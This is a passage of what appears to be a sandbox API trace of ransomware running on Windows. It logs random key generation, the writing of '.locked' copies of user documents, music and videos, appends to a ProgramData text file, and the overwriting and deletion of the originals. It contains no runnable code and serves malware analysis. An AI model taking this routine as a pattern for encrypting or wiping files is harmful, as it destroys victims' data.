"c:\\users\\rdhj0cnfevzx\\documents\\scxdc.xlsx.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0307.197] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x125e3d9c | out: lpMode=0x125e3d9c) returned 0 [0307.197] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e000 | out: pbBuffer=0x1263e000) returned 1 [0307.197] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766030 | out: pbBuffer=0x12766030) returned 1 [0307.197] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714001 | out: pbBuffer=0x12714001) returned 1 [0307.197] WriteFile (in: hFile=0x180, lpBuffer=0x126fb000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e3d78, lpOverlapped=0x0 | out: lpBuffer=0x126fb000*, lpNumberOfBytesWritten=0x125e3d78*=0x80, lpOverlapped=0x0) returned 1 [0307.200] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x1) returned 0x0 [0307.201] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x340afb30, ulCount=0x10, ulNumEntriesRemoved=0x340afb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x340afb30, ulNumEntriesRemoved=0x340afb10) returned 0 [0307.202] SetEvent (hEvent=0x150) returned 1 [0307.202] SetEvent (hEvent=0x1ac) returned 1 [0307.202] SetEvent (hEvent=0x1f0) returned 1 [0307.202] SetEvent (hEvent=0x20c) returned 1 [0307.202] ReadFile (in: hFile=0x19c, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e3d68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x125e3d68*=0x170bb, lpOverlapped=0x0) returned 1 [0307.207] WriteFile (in: hFile=0x180, lpBuffer=0x12770000*, nNumberOfBytesToWrite=0x170bb, lpNumberOfBytesWritten=0x125e3d74, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesWritten=0x125e3d74*=0x170bb, lpOverlapped=0x0) returned 1 [0307.298] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0307.303] SetEvent (hEvent=0x1ac) returned 1 [0307.303] ReadFile (in: hFile=0x19c, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e3d68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x125e3d68*=0x0, lpOverlapped=0x0) returned 1 [0307.303] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0307.340] CloseHandle (hObject=0x180) returned 1 [0307.362] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0307.710] CloseHandle (hObject=0x19c) returned 1 [0307.710] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0307.711] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x125e3e94 | out: lpMode=0x125e3e94) returned 0 [0307.711] WriteFile (in: hFile=0x19c, lpBuffer=0x1239a0c0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x125e3e64, lpOverlapped=0x0 | out: lpBuffer=0x1239a0c0*, lpNumberOfBytesWritten=0x125e3e64*=0x30, lpOverlapped=0x0) returned 1 [0307.711] CloseHandle (hObject=0x19c) returned 1 [0307.712] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\scXDc.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\scxdc.xlsx")) returned 1 [0307.840] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\scXDc.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\scxdc.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0307.895] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x125e3e88 | out: lpMode=0x125e3e88) returned 0 [0307.895] WriteFile (in: hFile=0x1a4, lpBuffer=0x14cda000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125e3e78, lpOverlapped=0x0 | out: lpBuffer=0x14cda000*, lpNumberOfBytesWritten=0x125e3e78*=0xfa000, lpOverlapped=0x0) returned 1 [0307.930] CloseHandle (hObject=0x1a4) returned 1 [0307.963] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\scXDc.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\scxdc.xlsx")) returned 1 [0307.991] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e0c0*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x125e3a24, lpReserved=0x0 | out: lpBuffer=0x1263e0c0*, lpNumberOfCharsWritten=0x125e3a24*=0xc) returned 1 [0308.091] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\A_ vsPrHANVz-cnbD2\\5yOfoWHhdYqKnUlxPol.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\a_ vsprhanvz-cnbd2\\5yofowhhdyqknulxpol.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0308.091] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x125e3d9c | out: lpMode=0x125e3d9c) returned 0 [0308.091] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\A_ vsPrHANVz-cnbD2\\5yOfoWHhdYqKnUlxPol.mp3.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\a_ vsprhanvz-cnbd2\\5yofowhhdyqknulxpol.mp3.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0308.246] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x125e3d9c | out: lpMode=0x125e3d9c) returned 0 [0308.246] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c240 | out: pbBuffer=0x1234c240) returned 1 [0308.247] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766030 | out: pbBuffer=0x12766030) returned 1 [0308.247] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702381 | out: pbBuffer=0x12702381) returned 1 [0308.247] WriteFile (in: hFile=0x1b0, lpBuffer=0x1238f000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e3d78, lpOverlapped=0x0 | out: lpBuffer=0x1238f000*, lpNumberOfBytesWritten=0x125e3d78*=0x80, lpOverlapped=0x0) returned 1 [0308.250] ReadFile (in: hFile=0x1a4, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e3d68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x125e3d68*=0x17988, lpOverlapped=0x0) returned 1 [0308.256] WriteFile (in: hFile=0x1b0, lpBuffer=0x12770000*, nNumberOfBytesToWrite=0x17988, lpNumberOfBytesWritten=0x125e3d74, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesWritten=0x125e3d74*=0x17988, lpOverlapped=0x0) returned 1 [0308.353] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0308.369] SetEvent (hEvent=0x20c) returned 1 [0308.369] ReadFile (in: hFile=0x1a4, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e3d68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x125e3d68*=0x0, lpOverlapped=0x0) returned 1 [0308.369] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0308.751] CloseHandle (hObject=0x1b0) returned 1 [0309.372] CloseHandle (hObject=0x1a4) returned 1 [0309.372] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0309.387] SetEvent (hEvent=0x22c) returned 1 [0309.387] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0309.408] SetEvent (hEvent=0x22c) returned 1 [0309.408] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0309.413] SetEvent (hEvent=0x22c) returned 1 [0309.413] SetEvent (hEvent=0x14c) returned 1 [0309.413] SetEvent (hEvent=0x134) returned 1 [0309.413] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0310.512] SetEvent (hEvent=0x1f0) returned 1 [0310.512] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x1) returned 0x102 [0310.545] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0310.545] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x1) returned 0x102 [0310.558] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0310.558] SetEvent (hEvent=0x104) returned 1 [0310.558] SetEvent (hEvent=0x1f0) returned 1 [0310.558] SetEvent (hEvent=0x1d0) returned 1 [0310.558] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0310.559] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x340afb34, ulCount=0x10, ulNumEntriesRemoved=0x340afb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x340afb34, ulNumEntriesRemoved=0x340afb14) returned 0 [0310.560] SetEvent (hEvent=0x150) returned 1 [0310.560] SetEvent (hEvent=0x1d0) returned 1 [0310.560] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x12667a24, lpReserved=0x0 | out: lpBuffer=0x125fc000*, lpNumberOfCharsWritten=0x12667a24*=0xc) returned 1 [0310.563] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\pqkT0R1dikE\\6PknB4UT.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\pqkt0r1dike\\6pknb4ut.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0310.563] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x12667d9c | out: lpMode=0x12667d9c) returned 0 [0310.563] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\pqkT0R1dikE\\6PknB4UT.wav.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\pqkt0r1dike\\6pknb4ut.wav.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0310.715] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0310.768] SetEvent (hEvent=0x1b8) returned 1 [0310.768] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x12667d9c | out: lpMode=0x12667d9c) returned 0 [0310.768] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0310.834] SetEvent (hEvent=0x14c) returned 1 [0310.834] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0310.856] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0310.927] SetEvent (hEvent=0x22c) returned 1 [0310.927] SetEvent (hEvent=0x1ac) returned 1 [0310.927] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0311.464] SetEvent (hEvent=0x134) returned 1 [0311.464] SetEvent (hEvent=0x198) returned 1 [0311.464] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0311.472] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0311.506] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x12665a24, lpReserved=0x0 | out: lpBuffer=0x1263e000*, lpNumberOfCharsWritten=0x12665a24*=0xc) returned 1 [0311.510] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\k84JGTm.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\k84jgtm.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0311.510] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x12665d9c | out: lpMode=0x12665d9c) returned 0 [0311.510] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\k84JGTm.mp3.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\k84jgtm.mp3.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0311.511] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x12665d9c | out: lpMode=0x12665d9c) returned 0 [0311.511] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e020 | out: pbBuffer=0x1263e020) returned 1 [0311.511] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8010 | out: pbBuffer=0x124a8010) returned 1 [0311.511] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702201 | out: pbBuffer=0x12702201) returned 1 [0311.511] WriteFile (in: hFile=0x1a4, lpBuffer=0x123db000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12665d78, lpOverlapped=0x0 | out: lpBuffer=0x123db000*, lpNumberOfBytesWritten=0x12665d78*=0x80, lpOverlapped=0x0) returned 1 [0311.514] ReadFile (in: hFile=0x200, lpBuffer=0x16c0a000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12665d68, lpOverlapped=0x0 | out: lpBuffer=0x16c0a000*, lpNumberOfBytesRead=0x12665d68*=0xc2b8, lpOverlapped=0x0) returned 1 [0311.523] WriteFile (in: hFile=0x1a4, lpBuffer=0x16c0a000*, nNumberOfBytesToWrite=0xc2b8, lpNumberOfBytesWritten=0x12665d74, lpOverlapped=0x0 | out: lpBuffer=0x16c0a000*, lpNumberOfBytesWritten=0x12665d74*=0xc2b8, lpOverlapped=0x0) returned 1 [0311.528] ReadFile (in: hFile=0x200, lpBuffer=0x16c0a000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12665d68, lpOverlapped=0x0 | out: lpBuffer=0x16c0a000*, lpNumberOfBytesRead=0x12665d68*=0x0, lpOverlapped=0x0) returned 1 [0311.528] CloseHandle (hObject=0x1a4) returned 1 [0311.529] CloseHandle (hObject=0x200) returned 1 [0311.529] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0311.529] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x12665e94 | out: lpMode=0x12665e94) returned 0 [0311.529] WriteFile (in: hFile=0x200, lpBuffer=0x1263c0f0*, nNumberOfBytesToWrite=0x2d, lpNumberOfBytesWritten=0x12665e64, lpOverlapped=0x0 | out: lpBuffer=0x1263c0f0*, lpNumberOfBytesWritten=0x12665e64*=0x2d, lpOverlapped=0x0) returned 1 [0311.529] CloseHandle (hObject=0x200) returned 1 [0311.530] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\k84JGTm.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\k84jgtm.mp3")) returned 1 [0311.572] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0311.711] VirtualAlloc (lpAddress=0x18320000, dwSize=0x100000, flAllocationType=0x1000, flProtect=0x4) returned 0x18320000 [0311.714] VirtualAlloc (lpAddress=0x10afe000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x10afe000 [0311.728] VirtualAlloc (lpAddress=0x18420000, dwSize=0x100000, flAllocationType=0x1000, flProtect=0x4) returned 0x18420000 [0311.731] VirtualAlloc (lpAddress=0x10aee000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x10aee000 [0311.749] VirtualAlloc (lpAddress=0x18520000, dwSize=0x100000, flAllocationType=0x1000, flProtect=0x4) returned 0x18520000 [0311.752] VirtualAlloc (lpAddress=0x10ade000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x10ade000 [0311.774] VirtualAlloc (lpAddress=0x18620000, dwSize=0x130000, flAllocationType=0x1000, flProtect=0x4) returned 0x18620000 [0311.778] VirtualAlloc (lpAddress=0x10aca000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x10aca000 [0311.800] VirtualAlloc (lpAddress=0x18750000, dwSize=0x100000, flAllocationType=0x1000, flProtect=0x4) returned 0x18750000 [0311.804] VirtualAlloc (lpAddress=0x10aba000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x10aba000 [0311.804] VirtualAlloc (lpAddress=0x2171000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x2171000 [0311.825] SetEvent (hEvent=0x104) returned 1 [0311.825] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0311.828] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0311.830] SetEvent (hEvent=0x12c) returned 1 [0311.830] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0312.019] SetEvent (hEvent=0x1b8) returned 1 [0312.019] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0312.405] SetEvent (hEvent=0x134) returned 1 [0312.405] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0318.304] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0318.306] SetEvent (hEvent=0x1b8) returned 1 [0318.306] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x1259fa24, lpReserved=0x0 | out: lpBuffer=0x125fc000*, lpNumberOfCharsWritten=0x1259fa24*=0xc) returned 1 [0318.307] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\MCHoHyAA18 aW.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\mchohyaa18 aw.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x234 [0318.307] GetConsoleMode (in: hConsoleHandle=0x234, lpMode=0x1259fd9c | out: lpMode=0x1259fd9c) returned 0 [0318.307] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\MCHoHyAA18 aW.avi.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\mchohyaa18 aw.avi.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0318.656] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0318.692] SetEvent (hEvent=0x150) returned 1 [0318.692] SetEvent (hEvent=0x134) returned 1 [0318.692] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x1259fd9c | out: lpMode=0x1259fd9c) returned 0 [0318.692] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0318.741] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0318.742] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0318.755] SetEvent (hEvent=0x12c) returned 1 [0318.755] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0318.764] SetEvent (hEvent=0x1f0) returned 1 [0318.764] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0318.811] SetEvent (hEvent=0x20c) returned 1 [0318.811] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0318.826] SetEvent (hEvent=0x1e8) returned 1 [0318.826] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0318.868] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x1) returned 0x0 [0318.875] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x340afb30, ulCount=0x10, ulNumEntriesRemoved=0x340afb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x340afb30, ulNumEntriesRemoved=0x340afb10) returned 0 [0318.875] SetEvent (hEvent=0x150) returned 1 [0318.875] SetEvent (hEvent=0x1ac) returned 1 [0318.875] SetEvent (hEvent=0x220) returned 1 [0318.875] SetEvent (hEvent=0x14c) returned 1 [0318.893] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\BiBb.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\bibb.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0318.898] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0319.001] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x125dae88 | out: lpMode=0x125dae88) returned 0 [0319.001] WriteFile (in: hFile=0x1c8, lpBuffer=0x1713a000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125dae78, lpOverlapped=0x0 | out: lpBuffer=0x1713a000*, lpNumberOfBytesWritten=0x125dae78*=0xfa000, lpOverlapped=0x0) returned 1 [0319.106] CloseHandle (hObject=0x1c8) returned 1 [0319.185] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\BiBb.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\bibb.avi")) returned 1 [0320.368] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0320.394] SetEvent (hEvent=0x14c) returned 1 [0320.394] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0320.404] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0320.404] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x125dce94 | out: lpMode=0x125dce94) returned 0 [0320.404] SwitchToThread () returned 1 [0320.405] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0320.410] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0320.432] SetEvent (hEvent=0x14c) returned 1 [0320.433] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0320.435] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x23c [0320.436] GetConsoleMode (in: hConsoleHandle=0x23c, lpMode=0x125dee94 | out: lpMode=0x125dee94) returned 0 [0320.436] SetEvent (hEvent=0x1dc) returned 1 [0320.436] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0320.495] SetEvent (hEvent=0x1dc) returned 1 [0320.495] SetEvent (hEvent=0x190) returned 1 [0320.495] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0320.497] SetEvent (hEvent=0x1dc) returned 1 [0320.497] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0320.498] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390000 | out: pbBuffer=0x12390000) returned 1 [0320.498] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e040 | out: pbBuffer=0x1234e040) returned 1 [0320.498] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340281 | out: pbBuffer=0x12340281) returned 1 [0320.498] WriteFile (in: hFile=0x1e0, lpBuffer=0x12705000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e3d78, lpOverlapped=0x0 | out: lpBuffer=0x12705000*, lpNumberOfBytesWritten=0x125e3d78*=0x80, lpOverlapped=0x0) returned 1 [0320.501] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x1) returned 0x0 [0320.502] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x340afb30, ulCount=0x10, ulNumEntriesRemoved=0x340afb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x340afb30, ulNumEntriesRemoved=0x340afb10) returned 0 [0320.502] SetEvent (hEvent=0x150) returned 1 [0320.502] SetEvent (hEvent=0x22c) returned 1 [0320.502] SetEvent (hEvent=0x190) returned 1 [0320.502] ReadFile (in: hFile=0x1bc, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e3d68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x125e3d68*=0x24d7, lpOverlapped=0x0) returned 1 [0320.504] WriteFile (in: hFile=0x1e0, lpBuffer=0x12770000*, nNumberOfBytesToWrite=0x24d7, lpNumberOfBytesWritten=0x125e3d74, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesWritten=0x125e3d74*=0x24d7, lpOverlapped=0x0) returned 1 [0320.505] ReadFile (in: hFile=0x1bc, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e3d68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x125e3d68*=0x0, lpOverlapped=0x0) returned 1 [0320.505] CloseHandle (hObject=0x1e0) returned 1 [0320.505] CloseHandle (hObject=0x1bc) returned 1 [0320.506] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0320.506] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x125e3e94 | out: lpMode=0x125e3e94) returned 0 [0320.506] WriteFile (in: hFile=0x1bc, lpBuffer=0x125ec050*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x125e3e64, lpOverlapped=0x0 | out: lpBuffer=0x125ec050*, lpNumberOfBytesWritten=0x125e3e64*=0x41, lpOverlapped=0x0) returned 1 [0320.506] CloseHandle (hObject=0x1bc) returned 1 [0320.506] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\wpDqCDIcADj00.flv" (normalized: 